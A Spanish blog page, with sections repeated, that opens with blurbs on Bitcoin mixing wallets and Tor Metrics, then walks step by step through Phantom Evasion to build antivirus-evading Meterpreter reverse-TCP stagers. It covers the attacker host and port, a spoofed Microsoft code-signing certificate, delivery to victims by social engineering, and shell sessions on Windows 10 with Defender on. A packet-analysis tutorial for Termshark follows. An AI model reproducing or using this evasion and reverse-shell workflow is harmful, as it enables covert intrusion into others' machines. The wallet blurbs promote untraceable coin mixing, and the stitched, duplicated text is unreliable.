Hidden Wallet es un monedero oculto en el que puedes guardar tus bitocins.  Promete tener seguridad de alto grado y no acceder nunca a tus contraseñas o información privada. “Para evitar el rastro mezclamos todos sus bitcoins y así el rastreo es imposible”, aseguran desde su página web y pretende mantener a salvo la identidad real de cualquier usuario que lo utilice.
Hidden Wallet

EasyCoin

Easy Coin es también un monedero Bitcoin que los mezcla de forma gratuita. Almacena todos los bitcoins encritados y los protege de posibles cibedelincuentes, lo hace de forma anónima y es compatible desde cualquier ordenador si usas Tor Browser en tu tablet Android o iOS o en tu móvil.
EasyCoin

Tor Metrics

Tor Metrics es una página web en la que encontrarás toda la información que necesitas sobre esta red. Puedes acceder a una fuente de noticias, a analíticas de tráfico… Todo lo que necesites saber sobre la red Tor, está en esta página web en la que verás gráficos con el número de clientes conectados e incluso qué países son los que más acceden de forma anónima a la red Tor o cuáles son los que menos. Datos muy interesantes para los curiosos.
TorMetrics

viernes, 29 de noviembre de 2019

Cómo evadir protección antivirus con Phantom Payloads

Metasploit es la herramienta más popular utilizada en pruebas de penetración. Metasploit intenta encontrar debilidades en su red local antes de que los hackers lo hagan. A continuación, presentaremos la herramienta más utilizada por los atacantes para probar la seguridad de su sistema operativo.
En Kali Linux, Metasploit estaa instalada por defecto e incluye una gran cantidad de cargas útiles (payloads) que se utilizan para generar ejecutables maliciosos y hackear plataformas. Pero hoy le mostraremos una herramienta llamada Phantom Evasion que se utiliza para generar ejecutables a prueba de detección usando la carga útil msfvenom. Según el desarrollador, el objetivo principal de Phantom Evasion es evitar que las soluciones antivirus detecten las cargas útiles.
  • Phantom Evasion se ha probado en Kali Linux 2018.4 (amd64)
  • Para clonar, escriba git clone https://github.com/oddcod3/Phantom-Evasion.git
  • Escriba cd Phantom-EvasionEscriba chmod u+x phantom-evasion.py
  • Escriba python3 phantom-evasion.py
  • Cuando se ejecuta por primera vez, puede aparecer algún error, pero la herramienta funcionará perfectamente
                     _                 _
                 _ __ | |__   __ _ _ __ | |_ ___  _ __ ___
                | '_ \| '_ \ / _` | '_ \| __/ _ \| '_ ` _ \
                | |_) | | | | (_| | | | | || (_) | | | | | |
                | .__/|_| |_|\__,_|_| |_|\__\___/|_| |_| |_|
                |_|   / _ \ \ / / _` / __| |/ _ \| '_ \
                     |  __/\ V / (_| \__ \ | (_) | | | |
                      \___| \_/ \__,_|___/_|\___/|_| |_|
                                                        v2.0.1
    =====================================================================
  ||        [MAIN MENU]:             ||                                  ||
  ||                                 ||                                  ||
  ||    [1]  Windows modules         ||   [5]  Universal modules         ||
  ||                                 ||                                  ||
  ||    [2]  Linux modules           ||   [6]  Post-Exploitation modules ||
  ||                                 ||                                  ||
  ||    [3]  OSX modules             ||   [7]  Update check              ||
  ||                                 ||                                  ||
  ||    [4]  Android modules         ||   [0]  Exit                      ||
  ||                                 ||                                  ||
    =====================================================================

[>] Please insert option:
  • Escriba 1
[>] Please insert option: 1
  • Escriba 2
 [+] WINDOWS MODULES INDEX:
 [1]  Shellcode Injection
 [2]  Stager
 [3]  Powershell / Wine-pyinstaller
 [0]  Back
 [>] Please insert option: 2
  • Escriba 1
[+] WINDOWS STAGER MODULES:
 [1]  X86 stagers
 [2]  X64 stagers
 [0]  Back
 [>] Please insert option: 1
  • Escriba 3
 [+] WINDOWS x86 STAGER MODULES:
 [1]  C meterpreter/reverse_TCP VirtualAlloc                           (C)
 [2]  C meterpreter/reverse_TCP VirtualAlloc NoDirectCall GPAGMH       (C)
 [3]  C meterpreter/reverse_TCP HeapAlloc                              (C)
 [4]  C meterpreter/reverse_TCP HeapAlloc NoDirectCall GPAGMH          (C)
 [5]  C meterpreter/reverse_HTTP VirtualAlloc                          (C)
 [6]  C meterpreter/reverse_HTTP VirtualAlloc NoDirectCall GPAGMH      (C)
 [7]  C meterpreter/reverse_HTTP HeapAlloc                             (C)
 [8]  C meterpreter/reverse_HTTP HeapAlloc NoDirectCall GPAGMH         (C)
 [9]  C meterpreter/reverse_HTTPS VirtualAlloc                         (C)
 [10] C meterpreter/reverse_HTTPS VirtualAlloc NoDirectCall GPAGMH     (C)
 [11] C meterpreter/reverse_HTTPS HeapAlloc                            (C)
 [12] C meterpreter/reverse_HTTPS HeapAlloc NoDirectCall GPAGMH        (C)
 [0]  Back
  • Después de seleccionar cualquier carga útil, se mostrará una descripción de la carga y en qué extensión se construirá
[+] MODULE DESCRIPTION:
 This Module generate and compile
   32bit pure c meterpreter reverse tcp stagers.
   Require msfconsole multi/handler listener
   with payload set to windows/meterpreter/reverse_tcp
 [>] Memory allocation type: HEAP
 [>] TYPE: TCP
   [>] STATIC EVASION:
   Polymorphic source code
   [>] DYNAMIC EVASION:
   Resource consumption technique
   Sandbox-aware code
   [>] AUTOCOMPILE(cross platform): to EXE file
 Press Enter to continue:
  • Escriba 192.168.1.6 (dirección IP del atacante)
[>] Please insert LHOST: 192.168.1.6
  • Escriba 433 (puerto del atacante)
[>] Please insert LPORT: 443
  • Luego ingrese el nombre del archivo: file
[>] Please insert output filename: file
  • Escriba n para crear un solo proceso en la computadora de destino. Por lo tanto, cada vez habrá menos posibilidades de ser atrapado por el antivirus
[>] Spawn Multiple Processes:
 During target-side execution this will cause to spawn a maximum of 4 processes
 consequentialy.
 Only the last spawned process will reach the malicious section of code
 while the other decoy processes spawned before will executes only random junk code
 [>] Add multiple processes behaviour?(y/n): n
  • Escriba y
[>] Generating C meterpreter stager
 [>] Compiling…
 [>] Strip
 strip is a GNU utility to "strip" symbols from object files.
 This is useful for minimizing their file size, streamlining them for distribution.
 It can also be useful for making it more difficult to reverse-engineer the compiled code.
 (Lower rate of detection)
 [>] Strip executable? (y/n): y
  • La consulta anterior reducirá el tamaño del archivo malicioso
  • Escriba y
[>] Sign Executable
 Online Certificate spoofer & Executabe signer (Lower rate of detection)
 [>] Sign executable? (y/n): y
  • La consulta anterior firmará el archivo malicioso con el certificado predeterminado que viene con Phantom Evasion
  • Puede usar su propio certificado o usarlo con el certificado de Microsoft que viene con la Phantom Evasion
  • Escriba y
  • Escriba 1
Certificates directory is not empty , use already existing certificate? (y/n): y
 [1] www.microsoft.com
 [2] Create new certificate
 [>] Select a Certificate or create a new one: 1
  • Escriba 1
[>] Select a Certificate or create a new one: 1

[>] Insert sign software description (default: Notepad Benchmark Util):
 [>] Signing file1.exe with osslsigncode…
 [>] Succeeded
 [<>] File saved in Phantom-Evasion folder
  • Después de crear un código malicioso, envíe el archivo al objetivo. Puede usar cualquier variante de ingeniería social para llegar a su objetivo
Probar en plataformas Windows
  • Para las pruebas, estamos usando Windows 7 (32 bits) con Windows Defender desactivado
  • Abra el archivo ejecutable presionando enter
  • Para comprobar la carga útil puede usar el controlador múltiple de metasploit que viene preinstalado en Kali Linux. Abra otro terminal y escriba msfconsole
  • Escriba use multi/handler
msf > use multi/handler
  • Escriba LHOST 192.168.1.6 (igual que se ingresó en Phantom Evasion)
  • Escriba LPORT 443 (igual que se ingresó en Phantom Evasion)
  • Escriba show options
msf exploit(multi/handler) > set LHOST 192.168.1.6
 LHOST => 192.168.1.6
 msf exploit(multi/handler) > set LPORT 443
 LPORT => 443
 msf exploit(multi/handler) > show options
 Module options (exploit/multi/handler):
 Name  Current Setting  Required  Description
    ----  ---------------  --------  -----------
 Payload options (windows/meterpreter/reverse_tcp):
 Name      Current Setting  Required  Description
    ----      ---------------  --------  -----------
    EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
    LHOST     192.168.1.6      yes       The listen address (an interface may be specified)
    LPORT     443              yes       The listen port
 Exploit target:
 Id  Name
    --  ----
    0   Wildcard Target
  • Escriba run
msf exploit(multi/handler) > run
  • Como malicioso ya se ha iniciado en Windows 7 Professional 32 Bit. Después de escribir, se creará una nueva sesión entre los atacantes y las máquinas de destino
  • Escriba sysinfo para verificar los detalles del equipo de destino
[] Started reverse TCP handler on 192.168.1.6:443 [] Sending stage (179779 bytes) to 192.168.1.9
 [*] Meterpreter session 1 opened (192.168.1.6:443 -> 192.168.1.9:49250) at 2019-03-04 00:34:27 -0500
 meterpreter > sysinfo
 Computer        : WIN-31VSBP3FUQT
 OS              : Windows 7 (Build 7601, Service Pack 1).
 Architecture    : x86
 System Language : en_US
 Domain          : WORKGROUP
 Logged On Users : 1
 Meterpreter     : x86/windows
 meterpreter >
  • Ahora puede manipular al objetivo utilizando el shell de comandos de meterpreter
  • Ahora, para realizar más pruebas, hemos utilizado Windows 10 Enterprise 1809 (x64) con Windows Defender habilitado
  • Abra el ejecutable malicioso en la máquina de Windows 10. A medida que abra el archivo ejecutable, se creará una nueva sesión en multi/handler
  • Escriba sysinfo para verificar los detalles del equipo de destino
[] Started reverse TCP handler on 192.168.1.6:443 [] Sending stage (179779 bytes) to 192.168.1.105
 [*] Meterpreter session 2 opened (192.168.1.6:443 -> 192.168.1.105:49753) at 2019-03-04 02:26:30 -0500
 meterpreter > sysinfo
 Computer        : DESKTOP-I9LEAU8
 OS              : Windows 10 (Build 17758).
 Architecture    : x64
 System Language : en_US
 Domain          : WORKGROUP
 Logged On Users : 2
 Meterpreter     : x86/windows
  • Ahora puede manipular el objetivo usando el shell de comandos de meterpreter
Según investigadores en seguridad en redes del Instituto Internacional de Seguridad Cibernética, esta herramienta se puede utilizar para generar una carga útil de nivel inicial que se puede personalizar aún más para evitar otros antivirus.

Cómo evadir protección antivirus con Phantom Payloads

Cómo evadir protección antivirus con Phantom Payloads

Metasploit es la herramienta más popular utilizada en pruebas de penetración. Metasploit intenta encontrar debilidades en su red local antes de que los hackers lo hagan. A continuación, presentaremos la herramienta más utilizada por los atacantes para probar la seguridad de su sistema operativo.
En Kali Linux, Metasploit estaa instalada por defecto e incluye una gran cantidad de cargas útiles (payloads) que se utilizan para generar ejecutables maliciosos y hackear plataformas. Pero hoy le mostraremos una herramienta llamada Phantom Evasion que se utiliza para generar ejecutables a prueba de detección usando la carga útil msfvenom. Según el desarrollador, el objetivo principal de Phantom Evasion es evitar que las soluciones antivirus detecten las cargas útiles.
  • Phantom Evasion se ha probado en Kali Linux 2018.4 (amd64)
  • Para clonar, escriba git clone https://github.com/oddcod3/Phantom-Evasion.git
  • Escriba cd Phantom-EvasionEscriba chmod u+x phantom-evasion.py
  • Escriba python3 phantom-evasion.py
  • Cuando se ejecuta por primera vez, puede aparecer algún error, pero la herramienta funcionará perfectamente
                     _                 _
                 _ __ | |__   __ _ _ __ | |_ ___  _ __ ___
                | '_ \| '_ \ / _` | '_ \| __/ _ \| '_ ` _ \
                | |_) | | | | (_| | | | | || (_) | | | | | |
                | .__/|_| |_|\__,_|_| |_|\__\___/|_| |_| |_|
                |_|   / _ \ \ / / _` / __| |/ _ \| '_ \
                     |  __/\ V / (_| \__ \ | (_) | | | |
                      \___| \_/ \__,_|___/_|\___/|_| |_|
                                                        v2.0.1
    =====================================================================
  ||        [MAIN MENU]:             ||                                  ||
  ||                                 ||                                  ||
  ||    [1]  Windows modules         ||   [5]  Universal modules         ||
  ||                                 ||                                  ||
  ||    [2]  Linux modules           ||   [6]  Post-Exploitation modules ||
  ||                                 ||                                  ||
  ||    [3]  OSX modules             ||   [7]  Update check              ||
  ||                                 ||                                  ||
  ||    [4]  Android modules         ||   [0]  Exit                      ||
  ||                                 ||                                  ||
    =====================================================================

[>] Please insert option:
  • Escriba 1
[>] Please insert option: 1
  • Escriba 2
 [+] WINDOWS MODULES INDEX:
 [1]  Shellcode Injection
 [2]  Stager
 [3]  Powershell / Wine-pyinstaller
 [0]  Back
 [>] Please insert option: 2
  • Escriba 1
[+] WINDOWS STAGER MODULES:
 [1]  X86 stagers
 [2]  X64 stagers
 [0]  Back
 [>] Please insert option: 1
  • Escriba 3
 [+] WINDOWS x86 STAGER MODULES:
 [1]  C meterpreter/reverse_TCP VirtualAlloc                           (C)
 [2]  C meterpreter/reverse_TCP VirtualAlloc NoDirectCall GPAGMH       (C)
 [3]  C meterpreter/reverse_TCP HeapAlloc                              (C)
 [4]  C meterpreter/reverse_TCP HeapAlloc NoDirectCall GPAGMH          (C)
 [5]  C meterpreter/reverse_HTTP VirtualAlloc                          (C)
 [6]  C meterpreter/reverse_HTTP VirtualAlloc NoDirectCall GPAGMH      (C)
 [7]  C meterpreter/reverse_HTTP HeapAlloc                             (C)
 [8]  C meterpreter/reverse_HTTP HeapAlloc NoDirectCall GPAGMH         (C)
 [9]  C meterpreter/reverse_HTTPS VirtualAlloc                         (C)
 [10] C meterpreter/reverse_HTTPS VirtualAlloc NoDirectCall GPAGMH     (C)
 [11] C meterpreter/reverse_HTTPS HeapAlloc                            (C)
 [12] C meterpreter/reverse_HTTPS HeapAlloc NoDirectCall GPAGMH        (C)
 [0]  Back
  • Después de seleccionar cualquier carga útil, se mostrará una descripción de la carga y en qué extensión se construirá
[+] MODULE DESCRIPTION:
 This Module generate and compile
   32bit pure c meterpreter reverse tcp stagers.
   Require msfconsole multi/handler listener
   with payload set to windows/meterpreter/reverse_tcp
 [>] Memory allocation type: HEAP
 [>] TYPE: TCP
   [>] STATIC EVASION:
   Polymorphic source code
   [>] DYNAMIC EVASION:
   Resource consumption technique
   Sandbox-aware code
   [>] AUTOCOMPILE(cross platform): to EXE file
 Press Enter to continue:
  • Escriba 192.168.1.6 (dirección IP del atacante)
[>] Please insert LHOST: 192.168.1.6
  • Escriba 433 (puerto del atacante)
[>] Please insert LPORT: 443
  • Luego ingrese el nombre del archivo: file
[>] Please insert output filename: file
  • Escriba n para crear un solo proceso en la computadora de destino. Por lo tanto, cada vez habrá menos posibilidades de ser atrapado por el antivirus
[>] Spawn Multiple Processes:
 During target-side execution this will cause to spawn a maximum of 4 processes
 consequentialy.
 Only the last spawned process will reach the malicious section of code
 while the other decoy processes spawned before will executes only random junk code
 [>] Add multiple processes behaviour?(y/n): n
  • Escriba y
[>] Generating C meterpreter stager
 [>] Compiling…
 [>] Strip
 strip is a GNU utility to "strip" symbols from object files.
 This is useful for minimizing their file size, streamlining them for distribution.
 It can also be useful for making it more difficult to reverse-engineer the compiled code.
 (Lower rate of detection)
 [>] Strip executable? (y/n): y
  • La consulta anterior reducirá el tamaño del archivo malicioso
  • Escriba y
[>] Sign Executable
 Online Certificate spoofer & Executabe signer (Lower rate of detection)
 [>] Sign executable? (y/n): y
  • La consulta anterior firmará el archivo malicioso con el certificado predeterminado que viene con Phantom Evasion
  • Puede usar su propio certificado o usarlo con el certificado de Microsoft que viene con la Phantom Evasion
  • Escriba y
  • Escriba 1
Certificates directory is not empty , use already existing certificate? (y/n): y
 [1] www.microsoft.com
 [2] Create new certificate
 [>] Select a Certificate or create a new one: 1
  • Escriba 1
[>] Select a Certificate or create a new one: 1

[>] Insert sign software description (default: Notepad Benchmark Util):
 [>] Signing file1.exe with osslsigncode…
 [>] Succeeded
 [<>] File saved in Phantom-Evasion folder
  • Después de crear un código malicioso, envíe el archivo al objetivo. Puede usar cualquier variante de ingeniería social para llegar a su objetivo
Probar en plataformas Windows
  • Para las pruebas, estamos usando Windows 7 (32 bits) con Windows Defender desactivado
  • Abra el archivo ejecutable presionando enter
  • Para comprobar la carga útil puede usar el controlador múltiple de metasploit que viene preinstalado en Kali Linux. Abra otro terminal y escriba msfconsole
  • Escriba use multi/handler
msf > use multi/handler
  • Escriba LHOST 192.168.1.6 (igual que se ingresó en Phantom Evasion)
  • Escriba LPORT 443 (igual que se ingresó en Phantom Evasion)
  • Escriba show options
msf exploit(multi/handler) > set LHOST 192.168.1.6
 LHOST => 192.168.1.6
 msf exploit(multi/handler) > set LPORT 443
 LPORT => 443
 msf exploit(multi/handler) > show options
 Module options (exploit/multi/handler):
 Name  Current Setting  Required  Description
    ----  ---------------  --------  -----------
 Payload options (windows/meterpreter/reverse_tcp):
 Name      Current Setting  Required  Description
    ----      ---------------  --------  -----------
    EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
    LHOST     192.168.1.6      yes       The listen address (an interface may be specified)
    LPORT     443              yes       The listen port
 Exploit target:
 Id  Name
    --  ----
    0   Wildcard Target
  • Escriba run
msf exploit(multi/handler) > run
  • Como malicioso ya se ha iniciado en Windows 7 Professional 32 Bit. Después de escribir, se creará una nueva sesión entre los atacantes y las máquinas de destino
  • Escriba sysinfo para verificar los detalles del equipo de destino
[] Started reverse TCP handler on 192.168.1.6:443 [] Sending stage (179779 bytes) to 192.168.1.9
 [*] Meterpreter session 1 opened (192.168.1.6:443 -> 192.168.1.9:49250) at 2019-03-04 00:34:27 -0500
 meterpreter > sysinfo
 Computer        : WIN-31VSBP3FUQT
 OS              : Windows 7 (Build 7601, Service Pack 1).
 Architecture    : x86
 System Language : en_US
 Domain          : WORKGROUP
 Logged On Users : 1
 Meterpreter     : x86/windows
 meterpreter >
  • Ahora puede manipular al objetivo utilizando el shell de comandos de meterpreter
  • Ahora, para realizar más pruebas, hemos utilizado Windows 10 Enterprise 1809 (x64) con Windows Defender habilitado
  • Abra el ejecutable malicioso en la máquina de Windows 10. A medida que abra el archivo ejecutable, se creará una nueva sesión en multi/handler
  • Escriba sysinfo para verificar los detalles del equipo de destino
[] Started reverse TCP handler on 192.168.1.6:443 [] Sending stage (179779 bytes) to 192.168.1.105
 [*] Meterpreter session 2 opened (192.168.1.6:443 -> 192.168.1.105:49753) at 2019-03-04 02:26:30 -0500
 meterpreter > sysinfo
 Computer        : DESKTOP-I9LEAU8
 OS              : Windows 10 (Build 17758).
 Architecture    : x64
 System Language : en_US
 Domain          : WORKGROUP
 Logged On Users : 2
 Meterpreter     : x86/windows
  • Ahora puede manipular el objetivo usando el shell de comandos de meterpreter
Según investigadores en seguridad en redes del Instituto Internacional de Seguridad Cibernética, esta herramienta se puede utilizar para generar una carga útil de nivel inicial que se puede personalizar aún más para evitar otros antivirus.

Un analizador de paquetes ligero y fácil de usar | Tshark


Hay muchas herramientas utilizadas por los administradores de red para escanear. Se realiza un escaneo de redes continuo de la red para verificar si hay alguna actividad maliciosa o no. Probablemente, Wireshark es la herramienta más utilizada en los cursos de hacking ético ofrecidos por el Instituto Internacional de Seguridad Cibernética (IICS) para verificar la actividad de la red.
Acorde a investigadores de hacking ético del IICS, Tshark se utiliza en pruebas de redes. Los paquetes de datos juegan un papel importante en la transmisión de la red. Hay muchos analizadores de paquetes que son utilizados por el administrador de la red para buscar paquetes de datos. Hoy analizamos otro analizador de paquetes de datos llamado Termshark. Termshark es una versión terminal de Wireshark escrita en GO-LANG GO.
Funciones
  • Analiza cada paquete usando vistas de wirehark. Filtra pcaps o capturas en vivo usando los filtros de visualización de Wireshark
  • Copia rangos de paquetes al portapapeles desde el terminal escrito en Golang, compila en un solo ejecutable en cada plataforma: descargas disponibles para Linux (+ termux), macOS, FreeBSD y Windows
  • Lee archivos pcap o busca interfaces en vivo (donde está permitido tshark)
Instalación
  • Para las pruebas se usó Kali Linux 2019.1 amd64. Antes de instalar Termshark, GO debe estar instalado. Escriba sudo apt-get update && sudo apt-get install golang
  • A continuación, escriba echo $GOPATH
  • Escriba GOPATH=/root/go/ para establecer la ruta GO.
  • Escriba sudo apt-get install tshark
  • Ahora puede descargar tshark desde Github con: git clone https://github.com/gcla/termshark.git
  • Escriba go get github.com/gcla/termshark/cmd/termshark
  • puede usar la precompilación de termshark desde: https://github.com/gcla/termshark/releases
  • wgethttps://github.com/gcla/termshark/releases/download/v1.0.0/termshark_1.0.0_linux_x64.tar.gz
  • Escriba tar -xvzf termshark_1.0.0_linux_x64.tar.gz
  • Escriba cd termshark_1.0.0_linux_x64
  • Escriba ./termshark: esta precompilación ofrece una interfaz GUI basada en línea de comandos
  • Primero analizaremos termshark con la línea de comandos y luego mostraremos la interfaz gráfica de usuario basada en la línea de comandos
Uso
  • Escriba tshark -h
  • -h muestra el menú de ayuda
root@kali:~/Downloads# tshark -h
 Running as user "root" and group "root". This could be dangerous.
 tshark: option requires an argument -- 'f'
 Usage: tshark [options] …
 Capture interface:
   -i            name or idx of interface (def: first non-loopback)
   -f       packet filter in libpcap filter syntax
   -s              packet snapshot length (def: appropriate maximum)
   -p                       don't capture in promiscuous mode
   -I                       capture in monitor mode, if available
   -B          size of kernel buffer (def: 2MB)
   -y 
           link layer type (def: first appropriate)
   --time-stamp-type  timestamp method for interface
   -D                       print list of interfaces and exit
   -L                       print list of link-layer types of iface and exit
   --list-time-stamp-types  print list of timestamp types for iface and exit
  • Escriba tshark -i wlan0
  • -i se utiliza para asignar interfaz de red
  • Para comprobar la interfaz de red, escriba iwconfig
root@kali:~/go# iwconfig
 wlan0     IEEE 802.11  ESSID:"H###W##"
           Mode:Managed  Frequency:2.457 GHz  Access Point: ##:##:##:8D:##:E4
           Bit Rate=65 Mb/s   Tx-Power=20 dBm
           Retry short limit:7   RTS thr=2347 B   Fragment thr:off
           Encryption key:off
           Power Management:on
           Link Quality=67/70  Signal level=-43 dBm
           Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
           Tx excessive retries:0  Invalid misc:74   Missed beacon:0
  • Escriba tshark -i wlan0
  • -i se utiliza para asignar interfaz de red
  • Esta consulta comenzará a capturar paquetes locales
root@kali:~/Downloads# tshark -i wlan0
 Running as user "root" and group "root". This could be dangerous.
 Capturing on 'wlan0'
     1 0.000000000  192.168.1.3 → 192.168.1.10 TCP 60 3047 → 22 [ACK] Seq=1 Ack=1 Win=253 Len=0
     2 0.589627876 192.168.1.10 → 192.168.1.3  SSH 214 Server: Encrypted packet (len=160)
     3 0.799904360  192.168.1.3 → 192.168.1.10 TCP 60 3047 → 22 [ACK] Seq=1 Ack=161 Win=252 Len=0
     4 1.103457921 192.168.1.10 → 192.168.1.3  SSH 310 Server: Encrypted packet (len=256)
     5 1.302880225  192.168.1.3 → 192.168.1.10 TCP 60 3047 → 22 [ACK] Seq=1 Ack=417 Win=251 Len=0
     6 1.615306911 192.168.1.10 → 192.168.1.3  SSH 310 Server: Encrypted packet (len=256)
     7 1.815734300  192.168.1.3 → 192.168.1.10 TCP 60 3047 → 22 [ACK] Seq=1 Ack=673 Win=256 Len=0
     8 2.127450002 192.168.1.10 → 192.168.1.3  SSH 310 Server: Encrypted packet (len=256)
     9 2.335133706  192.168.1.3 → 192.168.1.10 TCP 60 3047 → 22 [ACK] Seq=1 Ack=929 Win=255 Len=0
    10 2.639471642 192.168.1.10 → 192.168.1.3  SSH 310 Server: Encrypted packet (len=256)
    11 2.850235384  192.168.1.3 → 192.168.1.10 TCP 60 3047 → 22 [ACK] Seq=1 Ack=1185 Win=254 Len=0
    12 3.151440488 192.168.1.10 → 192.168.1.3  SSH 310 Server: Encrypted packet (len=256)
    13 3.360222085  192.168.1.3 → 192.168.1.10 TCP 60 3047 → 22 [ACK] Seq=1 Ack=1441 Win=253 Len=0
    14 3.539527427  192.168.1.3 → 239.255.255.250 SSDP 216 M-SEARCH * HTTP/1.1
  • La consulta anterior ha capturado paquetes TCP con secuencia y confirmación. El número de secuencia se utiliza para dividir los datos grandes en uno más pequeño. Mencionando cada dirección IP con cada protocolo de red
  • El campo Número de acuse de recibo contiene el siguiente número de secuencia que el remitente del acuse de recibo espera recibir
  • El análisis completo del número de secuencia y el número de confirmación es una parte interesante de los cursos de piratería ética ofrecidos por el Instituto Internacional de Seguridad Cibernética en Delhi, India
Capturar el paquete deseado de datos
  • Escriba tshark -i wlan0 UDP
  • -i se utiliza para mencionar la interfaz de red. wlan0 es nuestra interfaz de red
  • tshark capturará solo paquetes UDP
root@kali:~# tshark -i wlan0 udp
 0Running as user "root" and group "root". This could be dangerous.
 Capturing on 'wlan0'
     1 0.000000000 192.168.1.10 → 192.168.1.255 BROWSER 243 Host Announcement DESKTOP-382RT0N, Workstation, Server, NT Workstation
     2 10.047894475  192.168.1.6 → 192.168.1.1  DNS 71 Standard query 0x575b A youtube.com
     3 10.047935767  192.168.1.6 → 192.168.1.1  DNS 71 Standard query 0x1367 AAAA youtube.com
     4 10.068684885  192.168.1.1 → 192.168.1.6  DNS 314 Standard query response 0x575b A youtube.com A 216.58.200.174 NS ns3.google.com NS ns4.google.com NS ns2.google.com NS ns1.google.com A 216.239.32.10 A 216.239.34.10 A 216.239.36.10 A 216.239.38.10 AAAA 2001:4860:4802:32::a AAAA 2001:4860:4802:36::a AAAA 2001:4860:4802:38::a
     5 10.136276096  192.168.1.1 → 192.168.1.6  DNS 326 Standard query response 0x1367 AAAA youtube.com AAAA 2404:6800:4002:811::200e NS ns1.google.com NS ns2.google.com NS ns4.google.com NS ns3.google.com A 216.239.32.10 A 216.239.34.10 A 216.239.36.10 A 216.239.38.10 AAAA 2001:4860:4802:32::a AAAA 2001:4860:4802:36::a AAAA 2001:4860:4802:38::a
     6 10.352876669  192.168.1.6 → 192.168.1.1  DNS 73 Standard query 0x05c2 A ocsp.pki.goog
     7 10.358805848  192.168.1.1 → 192.168.1.6  DNS 344 Standard query response 0x05c2 A ocsp.pki.goog CNAME pki-goog.l.google.com A 172.217.166.3 NS ns1.google.com NS ns2.google.com NS ns4.google.com NS ns3.google.com A 216.239.32.10 A 216.239.34.10 A 216.239.36.10 A 216.239.38.10 AAAA 2001:4860:4802:32::a AAAA 2001:4860:4802:36::a AAAA 2001:4860:4802:38::a
     8 10.556555958  192.168.1.6 → 192.168.1.1  DNS 75 Standard query 0x4d56 A www.youtube.com
     9 10.556594357  192.168.1.6 → 192.168.1.1  DNS 75 Standard query 0xe65e AAAA www.youtube.com
  • UDP (User Datagram Protocol) se usa para enviar mensajes cortos. El tráfico de la red UDP se organiza en forma de datagramas. Su protocolo no confiable y sin conexión
  • La consulta anterior ha recopilado registros diferidos después de asignar el protocolo UDP. En primer lugar, muestra la solicitud se envía al navegador. Luego muestra la solicitud de DNS (Sistema de nombres de dominio) para la URL (youtube.com) con la dirección IP de 216.58.200.174. También puede comprobar lo mismo con nslookup
  • Uso del Servidor de nombres (NS) ns1.google.com con una consulta de DNS estándar
Interfaz GUI basada en la línea de comandos de Termshark
  • Escriba cd termshark_1.0.0_linux_x64
  • Escriba ./termshark -i wlan0
  • -i se utiliza para mencionar la interfaz de red. wlan0 es nuestra interfaz de red
  • Presione el botón ? en el teclado de su computadora
  • La consulta anterior muestra los paquetes capturados y el menú de ayuda
Filtrado de paquetes con GUI basada en línea de comandos
  • Escriba ./termshark -i wlan0
  • -i se utiliza para mencionar la interfaz de red. wlan0 es nuestra interfaz de red.
  • Después de que termshark comenzará a capturar el paquete. En el cuadro de diálogo Filtro, puede ingresar cualquier protocolo. Aquí hemos escrito UDP. Después de escribir UDP, haga clic en Aplicar para capturar solo paquetes UDP
  • La salida anterior muestra la transmisión de paquetes, mostrando la dirección IP de origen y destino con la longitud del paquete. A continuación verás cómo funciona UDP
  • Cada paquete muestra con el tiempo necesario para la transmisión
  • La apertura de los primeros cuadros de paquetes muestra que el paquete es de 216 bytes. Luego muestra el tiempo de llegada y el cambio de tiempo del paquete
  • El análisis adicional muestra la versión de solicitud y el agente de usuario utilizado en la transferencia de paquetes de datos
Sólo ver transmisión de paquetes
  • Escriba ./termshark -i wlan
  • -i se utiliza para mencionar la interfaz de red. wlan0 es nuestra interfaz de red
  • Presione el botón / en el teclado para ver solo la transmisión de paquetes
  • La salida anterior muestra la transmisión de paquetes en la red interna. Puede ver paquetes de transacciones entre dos direcciones IPv4
  • Luego muestra el tamaño de paquete de Ethernet encriptado len = 64. Con Seq = 1 y cambiando el reconocimiento
Abrir archivos PCAP
  • Ahora, muchas veces recibe el archivo pcap durante sus proyectos con el Instituto Internacional de Seguridad Cibernética para analizar el flujo de paquetes y realizar actividades forenses cibernéticas en el archivo pcap
  • Puede abrir cualquier archivo guardado desde cualquier otro analizador de red. Aquí hemos abierto otro archivo pcap que se guardó después de capturar la red interna con wireshark
  • Para abrir archivos pcap., escriba ./termshark -r wlan0-299382837.pcap
  • -r se usa para mencionar el archivo pcap. 299382837 es un archivo pcap
  • La captura de pantalla de arriba muestra la transmisión de paquetes de los protocolos de red UDP e ICMP. Además, muestra la transmisión de paquetes utilizando HTTP 1.1 con el tiempo que tomó transferir paquetes desde la dirección IP de origen a destino

Un analizador de paquetes ligero y fácil de usar | Tshark

Un analizador de paquetes ligero y fácil de usar | Tshark


Hay muchas herramientas utilizadas por los administradores de red para escanear. Se realiza un escaneo de redes continuo de la red para verificar si hay alguna actividad maliciosa o no. Probablemente, Wireshark es la herramienta más utilizada en los cursos de hacking ético ofrecidos por el Instituto Internacional de Seguridad Cibernética (IICS) para verificar la actividad de la red.
Acorde a investigadores de hacking ético del IICS, Tshark se utiliza en pruebas de redes. Los paquetes de datos juegan un papel importante en la transmisión de la red. Hay muchos analizadores de paquetes que son utilizados por el administrador de la red para buscar paquetes de datos. Hoy analizamos otro analizador de paquetes de datos llamado Termshark. Termshark es una versión terminal de Wireshark escrita en GO-LANG GO.
Funciones
  • Analiza cada paquete usando vistas de wirehark. Filtra pcaps o capturas en vivo usando los filtros de visualización de Wireshark
  • Copia rangos de paquetes al portapapeles desde el terminal escrito en Golang, compila en un solo ejecutable en cada plataforma: descargas disponibles para Linux (+ termux), macOS, FreeBSD y Windows
  • Lee archivos pcap o busca interfaces en vivo (donde está permitido tshark)
Instalación
  • Para las pruebas se usó Kali Linux 2019.1 amd64. Antes de instalar Termshark, GO debe estar instalado. Escriba sudo apt-get update && sudo apt-get install golang
  • A continuación, escriba echo $GOPATH
  • Escriba GOPATH=/root/go/ para establecer la ruta GO.
  • Escriba sudo apt-get install tshark
  • Ahora puede descargar tshark desde Github con: git clone https://github.com/gcla/termshark.git
  • Escriba go get github.com/gcla/termshark/cmd/termshark
  • puede usar la precompilación de termshark desde: https://github.com/gcla/termshark/releases
  • wgethttps://github.com/gcla/termshark/releases/download/v1.0.0/termshark_1.0.0_linux_x64.tar.gz
  • Escriba tar -xvzf termshark_1.0.0_linux_x64.tar.gz
